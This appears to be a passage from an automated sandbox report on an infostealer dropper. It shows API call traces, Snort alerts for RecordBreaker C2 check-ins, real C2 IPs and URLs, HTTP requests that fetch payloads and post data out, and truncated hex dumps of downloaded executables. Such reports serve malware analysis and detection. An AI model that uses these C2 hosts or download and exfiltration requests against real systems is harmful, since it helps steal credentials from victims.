Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	20_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,	20_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,	20_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	20_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	20_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,	20_2_0040633E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	20_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	20_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	23_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	23_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	23_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	23_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	23_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	23_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	23_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	23_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	23_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	23_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 23_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	23_2_0040633E

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2038485 ET TROJAN Win32/RecordBreaker - Observed UA M1 192.168.2.3:49774 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin M1 192.168.2.3:49774 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 45.95.11.158:80 -> 192.168.2.3:49774
Source: Traffic	Snort IDS: 2038487 ET TROJAN Win32/RecordBreaker - Library Request 192.168.2.3:49774 -> 45.95.11.158:80
Source: Traffic	Snort IDS: 2038486 ET TROJAN Win32/RecordBreaker - Observed UA M2 192.168.2.3:49774 -> 45.95.11.158:80

Yara detected MSILDownloaderGeneric

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7812, type: MEMORYSTR

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 103.89.90.61 ports 34589,3,4,5,8,9
Source: global traffic	TCP traffic: 185.191.229.101 ports 0,1,40915,4,5,9

Yara detected Generic Downloader

Source: Yara match	File source: 26.0.namdoitntn.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.WSkT8d093C.exe.3adae14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://193.56.146.177

Source: global traffic	HTTP traffic detected: GET /1571 HTTP/1.1Host: 135.181.104.248
Source: global traffic	HTTP traffic detected: GET /0586872789.zip HTTP/1.1Host: 135.181.104.248Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----6241066765658901Host: 135.181.104.248Content-Length: 28422Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:47 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:53 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:54 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 01:42:54 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 